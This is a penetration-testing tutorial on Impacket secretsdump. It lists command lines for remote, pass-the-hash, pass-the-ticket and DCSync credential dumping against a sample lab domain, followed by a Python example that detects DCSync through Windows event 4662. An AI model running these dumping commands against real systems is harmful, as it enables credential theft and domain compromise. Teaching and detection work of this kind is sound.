Impacket SecretsDump is a powerful tool used in penetration testing and ethical hacking for extracting plaintext credentials and other sensitive information from Windows systems. Developed in Python, Impacket is an open-source collection of Python classes for working with network protocols. SecretsDump, a part of the Impacket suite, focuses specifically on extracting credentials and secrets from Windows machines.
Hive | Details | Format or credential material |
---|---|---|
SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords; LM or NT hashes; Kerberos keys (DES, AES); Domain Cached Credentials (DCC1 and DCC2); Security Questions (`L$SQSA<SID>`) |
SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |
Capabilities:
- Credential Extraction
- Kerberos Ticket Extraction
- NTLM Hash Dumping
- Local and Remote Operations
- Pass-the-Ticket (PTT) Attack
How to use
1. Display the tool help
- impacket-secretsdump -h
2. Remote dumping of SAM & LSA secrets
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.101
3. Dump the NTLM hashes of Active Directory users from a domain controller
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.100 -just-dc-ntlm
4. Remote dumping of SAM & LSA secrets (pass-the-hash)
- secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
- impacket-secretsdump lab.local/administrator@192.168.0.100 -hashes aad3b435b51404eeaad3b435b51404ee:702262e2d64f9c0df2bec8ca45ff2985
5. Remote dumping of SAM & LSA secrets (pass-the-ticket)
- secretsdump.py -k 'DOMAIN/USER@TARGET'
6. Offline dumping of LSA secrets from exported hives
- secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
7. Offline dumping of SAM secrets from exported hives
- secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL
8. Offline dumping of SAM & LSA secrets from exported hives
- secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL
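The DC dump in step 3 is performed over the directory replication protocol, so on the defender's side it shows up as Security event 4662 where a non-DC account requests the replication control-access rights on the domain object. The following is an added example (not from this page or from Impacket) that parses constructed 4662 records and flags such requests; the right GUIDs and field names are real, while the account names, hostnames and the non-replication GUID are sample values.

```python
import re
from typing import Dict, FrozenSet, Iterable, List

# Control-access rights checked by DRSUAPI replication (what secretsdump's
# -just-dc* modes use). GUIDs are the fixed rightsGuid values from the AD schema.
REPLICATION_RIGHTS: Dict[str, str] = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed 4662 records (field names follow the Security log schema; the
# accounts, hostnames and the all-zero GUID are sample values only).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "LAB", "SubjectUserName": "DC01$",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # DC-to-DC: benign
    {"EventID": 4662, "SubjectDomainName": "LAB", "SubjectUserName": "vry4n",
     "Properties": "Control Access\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # user account: flag
    {"EventID": 4662, "SubjectDomainName": "LAB", "SubjectUserName": "jdoe",
     "Properties": "Read Property\n\t{00000000-0000-0000-0000-000000000000}"},
    {"EventID": 4624, "SubjectDomainName": "LAB", "SubjectUserName": "vry4n",
     "Properties": ""},  # different event type, ignored
]
DC_ACCOUNTS: FrozenSet[str] = frozenset({"DC01$", "DC02$"})  # constructed

def replication_rights_requested(event: dict) -> List[str]:
    """Names of replication rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPLICATION_RIGHTS]

def detect_dcsync(events: Iterable[dict], dc_accounts: FrozenSet[str],
                  allowlist: FrozenSet[str] = frozenset()) -> List[dict]:
    """Flag replication-right requests by accounts that are not DCs. allowlist
    covers known legitimate replicators (e.g. a directory sync service account).
    Needs Directory Service Access auditing plus a SACL on the domain object."""
    trusted = {a.upper() for a in dc_accounts} | {a.upper() for a in allowlist}
    findings = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_requested(ev)
        subject = ev.get("SubjectUserName", "")
        if rights and subject.upper() not in trusted:
            findings.append({"subject": f"{ev.get('SubjectDomainName')}\\{subject}",
                             "rights": rights})
    return findings
```

Without the audit policy and SACL mentioned in the docstring no 4662 is logged for replication requests, so the check runs on nothing.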